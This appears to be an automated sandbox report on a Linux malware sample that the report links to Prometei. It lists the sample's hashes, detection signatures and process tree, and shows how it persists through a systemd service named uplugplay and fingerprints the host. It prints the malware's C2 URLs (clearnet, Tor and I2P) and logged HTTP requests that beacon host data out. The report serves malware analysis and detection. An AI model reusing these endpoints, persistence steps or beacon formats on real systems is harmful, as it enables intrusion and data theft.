Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nRlZAbNdJx

Overview

General Information

Sample Name:nRlZAbNdJx
Analysis ID:559902
MD5:c3e9e5145fad7c4d161f68f822662519
SHA1:b0c4bd227fcefcad1c250738a9d027865b238650
SHA256:ee3d72cbb8ede3949a5cb0c5b708087fc482254cc80dd7745be277dd2b5ba122
Tags:64elf
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found Tor onion address
Drops files in suspicious directories
Sample deletes itself
Sample is packed with UPX
Sample contains only a LOAD segment without any section mappings
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "uname" command used to read OS and architecture name
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Sample listens on a socket
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Reads CPU information from /proc indicative of miner or evasive malware
Executes the "rm" command used to delete files or directories
Executes the "pgrep" command search for and/or send signals to processes

Classification

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:559902
Start date:26.01.2022
Start time:00:21:34
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:nRlZAbNdJx
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal64.evad.lin@0/5@2/0
  • VT rate limit hit for: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Command:/tmp/nRlZAbNdJx
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Starting...
System install...OK
Standard Error:Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.
  • system is lnxubuntu20
  • dash New Fork (PID: 5256, Parent: 5253)
  • ls (PID: 5256, Parent: 5253, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
  • dash New Fork (PID: 5257, Parent: 5253)
  • systemctl (PID: 5257, Parent: 5253, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
  • gzip (PID: 5258, Parent: 5178, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
  • sh (PID: 5259, Parent: 5178, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
    • sh New Fork (PID: 5260, Parent: 5259)
    • rsyslog-rotate (PID: 5260, Parent: 5259, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
      • systemctl (PID: 5261, Parent: 5260, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • nRlZAbNdJx (PID: 5289, Parent: 5115, MD5: c3e9e5145fad7c4d161f68f822662519) Arguments: /tmp/nRlZAbNdJx
    • sh (PID: 5292, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep nRlZAbNdJx"
      • sh New Fork (PID: 5293, Parent: 5292)
      • pgrep (PID: 5293, Parent: 5292, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep nRlZAbNdJx
    • sh (PID: 5296, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof nRlZAbNdJx"
      • sh New Fork (PID: 5297, Parent: 5296)
      • pidof (PID: 5297, Parent: 5296, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof nRlZAbNdJx
    • sh (PID: 5300, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep uplugplay"
      • sh New Fork (PID: 5301, Parent: 5300)
      • pgrep (PID: 5301, Parent: 5300, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep uplugplay
    • sh (PID: 5306, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof uplugplay"
      • sh New Fork (PID: 5307, Parent: 5306)
      • pidof (PID: 5307, Parent: 5306, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof uplugplay
    • sh (PID: 5310, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pgrep upnpsetup"
      • sh New Fork (PID: 5311, Parent: 5310)
      • pgrep (PID: 5311, Parent: 5310, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep upnpsetup
    • sh (PID: 5314, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "pidof upnpsetup"
      • sh New Fork (PID: 5315, Parent: 5314)
      • pidof (PID: 5315, Parent: 5314, MD5: f58f67968fc50f1497f9ea9e9c22b6e8) Arguments: pidof upnpsetup
    • sh (PID: 5316, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
      • sh New Fork (PID: 5319, Parent: 5316)
      • systemctl (PID: 5319, Parent: 5316, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • sh (PID: 5332, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable uplugplay.service"
      • sh New Fork (PID: 5333, Parent: 5332)
      • systemctl (PID: 5333, Parent: 5332, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable uplugplay.service
    • sh (PID: 5340, Parent: 5289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start uplugplay.service"
      • sh New Fork (PID: 5341, Parent: 5340)
      • systemctl (PID: 5341, Parent: 5340, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start uplugplay.service
  • systemd New Fork (PID: 5321, Parent: 5320)
  • snapd-env-generator (PID: 5321, Parent: 5320, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5338, Parent: 5337)
  • snapd-env-generator (PID: 5338, Parent: 5337, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5344, Parent: 1)
  • uplugplay (PID: 5344, Parent: 1, MD5: c3e9e5145fad7c4d161f68f822662519) Arguments: /usr/sbin/uplugplay
    • uplugplay New Fork (PID: 5354, Parent: 5344)
      • sh (PID: 5355, Parent: 5354, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/usr/sbin/uplugplay -Dcomsvc"
        • sh New Fork (PID: 5356, Parent: 5355)
        • uplugplay (PID: 5356, Parent: 5355, MD5: c3e9e5145fad7c4d161f68f822662519) Arguments: /usr/sbin/uplugplay -Dcomsvc
          • sh (PID: 5388, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /proc/cpuinfo"
            • sh New Fork (PID: 5389, Parent: 5388)
            • cat (PID: 5389, Parent: 5388, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /proc/cpuinfo
          • sh (PID: 5392, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5393, Parent: 5392)
            • dmidecode (PID: 5393, Parent: 5392, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5396, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5397, Parent: 5396)
            • dmidecode (PID: 5397, Parent: 5396, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5400, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5401, Parent: 5400)
            • dmidecode (PID: 5401, Parent: 5400, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5404, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5405, Parent: 5404)
            • dmidecode (PID: 5405, Parent: 5404, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5408, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5409, Parent: 5408)
            • dmidecode (PID: 5409, Parent: 5408, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5412, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "dmidecode --type baseboard"
            • sh New Fork (PID: 5413, Parent: 5412)
            • dmidecode (PID: 5413, Parent: 5412, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode --type baseboard
          • sh (PID: 5416, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c dmidecode
            • sh New Fork (PID: 5417, Parent: 5416)
            • dmidecode (PID: 5417, Parent: 5416, MD5: 37284ba29446fb2dadf1ce80f8139c1a) Arguments: dmidecode
          • sh (PID: 5420, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "cat /etc/os-release"
            • sh New Fork (PID: 5421, Parent: 5420)
            • cat (PID: 5421, Parent: 5420, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /etc/os-release
          • sh (PID: 5424, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c uptime
            • sh New Fork (PID: 5425, Parent: 5424)
            • uptime (PID: 5425, Parent: 5424, MD5: 3ad70d8e33316ac713bf25c2ddf2fb14) Arguments: uptime
          • sh (PID: 5428, Parent: 5356, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "uname -a"
            • sh New Fork (PID: 5429, Parent: 5428)
            • uname (PID: 5429, Parent: 5428, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -a
  • dash New Fork (PID: 5363, Parent: 4332)
  • rm (PID: 5363, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.09wTQqP0ri /tmp/tmp.Elrt5dWRAb /tmp/tmp.bCH853YTmb
  • cleanup
SourceRuleDescriptionAuthorStrings
nRlZAbNdJxSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer
SourceRuleDescriptionAuthorStrings
/usr/sbin/uplugplaySUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x671d0:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0x6723f:$s2: $Id: UPX
  • 0x671f0:$s3: $Info: This file is packed with the UPX executable packer

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nRlZAbNdJxVirustotal: Detection: 15%Perma Link
Source: nRlZAbNdJxReversingLabs: Detection: 25%
Source: /usr/bin/pgrep (PID: 5293)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5301)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/sbin/uplugplay (PID: 5356)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/uptime (PID: 5425)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/cat (PID: 5389)Reads CPU info from proc file: /proc/cpuinfoJump to behavior

Networking

barindex
Source: nRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: nRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: Mhttp://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi/usr/sbin/uplugplay/etc/uplugplay/etc/CommIdcrashed.dump/usr/sbin//etc/msdtcmsdtc2msdtc3/etc/pcc0/etc/pcc1pbdebug
Source: /usr/sbin/uplugplay (PID: 5356)Socket: 0.0.0.0::88Jump to behavior
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32G HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0QE04MVkwSTFJUThCM1IyWk5IDQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MjI6NTEgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNzcsIDEuMTQsIDAuNDYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=5HNN7ZK1006GY32G&h=galassia&enckey=ZLIgKA9VenPwM5c9yeLOnmb3oEZqiSh9Tzvp/iPtq7XWt5J5uQ5caiCY6jlKxfjHiwtEFIzxvxeiWJeylm19FJ24k5cVIQ900f4GlpqIHIJlAcd3c6M1po5PO9+NKnm8Zl3CR7s4J8O8LmyYD13xgBOOE5tbighmR5xnqhAifpY= HTTP/1.0Host: p3.feefreepool.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33608
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 33608 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 54.171.230.55
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: nRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://dummy.zero/cgi-bin/prometei.cgi
Source: nRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: nRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgi
Source: nRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: http://p3.feefreepool.net/cgi-bin/prometei.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rg
Source: nRlZAbNdJx, uplugplay.22.drString found in binary or memory: http://upx.sf.net
Source: nRlZAbNdJx, 5289.1.00000000a41ba199.00000000d55ef298.rw-.sdmpString found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: unknownDNS traffic detected: queries for: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?r=53&i=5HNN7ZK1006GY32G HTTP/1.0Host: p3.feefreepool.net
Source: global trafficHTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2My4wM0xfVW5peDY0QE04MVkwSTFJUThCM1IyWk5IDQpnYWxhc3NpYQ0KDQoyeCBJbnRlbChSKSBYZW9uKFIpIFNpbHZlciA0MjEwIENQVSBAIDIuMjBHSHoNCg0KDQoNCg0KDQpVYnVudHUgJiAyMC4wNC4yIExUUyAoRm9jYWwgRm9zc2EpIA0KDQovdXNyL3NiaW4vDQogMDA6MjI6NTEgdXAgNyBtaW4sICAxIHVzZXIsICBsb2FkIGF2ZXJhZ2U6IDIuNzcsIDEuMTQsIDAuNDYNCkxpbnV4IGdhbGFzc2lhIDUuNC4wLTcyLWdlbmVyaWMgIzgwLVVidW50dSBTTVAgTW9uIEFwciAxMiAxNzozNTowMCBVVEMgMjAyMSB4ODZfNjQgeDg2XzY0IHg4Nl82NCBHTlUvTGludXgNCn0NCg__&i=5HNN7ZK1006GY32G&h=galassia&enckey=ZLIgKA9VenPwM5c9yeLOnmb3oEZqiSh9Tzvp/iPtq7XWt5J5uQ5caiCY6jlKxfjHiwtEFIzxvxeiWJeylm19FJ24k5cVIQ900f4GlpqIHIJlAcd3c6M1po5PO9+NKnm8Zl3CR7s4J8O8LmyYD13xgBOOE5tbighmR5xnqhAifpY= HTTP/1.0Host: p3.feefreepool.net
Source: LOAD without section mappingsProgram segment: 0x400000
Source: nRlZAbNdJx, type: SAMPLEMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: /usr/sbin/uplugplay, type: DROPPEDMatched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: classification engineClassification label: mal64.evad.lin@0/5@2/0

Data Obfuscation

barindex
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sampleString containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $
Source: /tmp/nRlZAbNdJx (PID: 5289)File written: /usr/sbin/uplugplayJump to dropped file
Source: /usr/sbin/uplugplay (PID: 5356)Reads from proc file: /proc/statJump to behavior
Source: /usr/bin/cat (PID: 5389)Reads from proc file: /proc/cpuinfoJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5147/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5147/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1582/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1582/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/3088/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/3088/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/230/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/230/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/110/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/110/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/231/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/231/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/111/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/111/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/232/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/232/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1579/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1579/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/112/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/112/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/233/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/233/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1699/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1699/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/113/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/113/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/234/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/234/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1335/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1335/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1698/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1698/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/114/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/114/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/235/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/235/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1334/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1334/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1576/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1576/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/2302/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/2302/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/115/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/115/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/236/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/236/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/116/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/116/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/237/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/237/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/117/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/117/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/118/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/118/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/910/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/910/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/119/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/119/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/912/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/912/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/10/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/10/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/2307/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/2307/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/11/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/11/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/918/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/918/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/12/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/12/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/13/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/13/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/14/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/14/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5033/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5033/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/15/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/15/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5034/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5034/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5155/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/5155/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/16/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/16/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/17/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/17/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/18/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/18/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1594/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1594/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/120/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/120/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/121/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/121/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1349/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1349/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/1/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/122/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/122/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/243/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/243/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/123/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/123/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/2/statusJump to behavior
Source: /usr/bin/pgrep (PID: 5311)File opened: /proc/2/cmdlineJump to behavior
Source: /usr/bin/dash (PID: 5257)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active cups.serviceJump to behavior
Source: /usr/lib/rsyslog/rsyslog-rotate (PID: 5261)Systemctl executable: /usr/bin/systemctl -> systemctl kill -s HUP rsyslog.serviceJump to behavior
Source: /bin/sh (PID: 5319)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5333)Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.serviceJump to behavior
Source: /bin/sh (PID: 5341)Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.serviceJump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5289)File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)Jump to behavior
Source: /usr/sbin/logrotate (PID: 5259)Shell command executed: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslogJump to behavior
Source: /tmp/nRlZAbNdJx (PID: 5292)Shell command executed: sh -c "pgrep nRlZAbNdJx"Jump to behavior
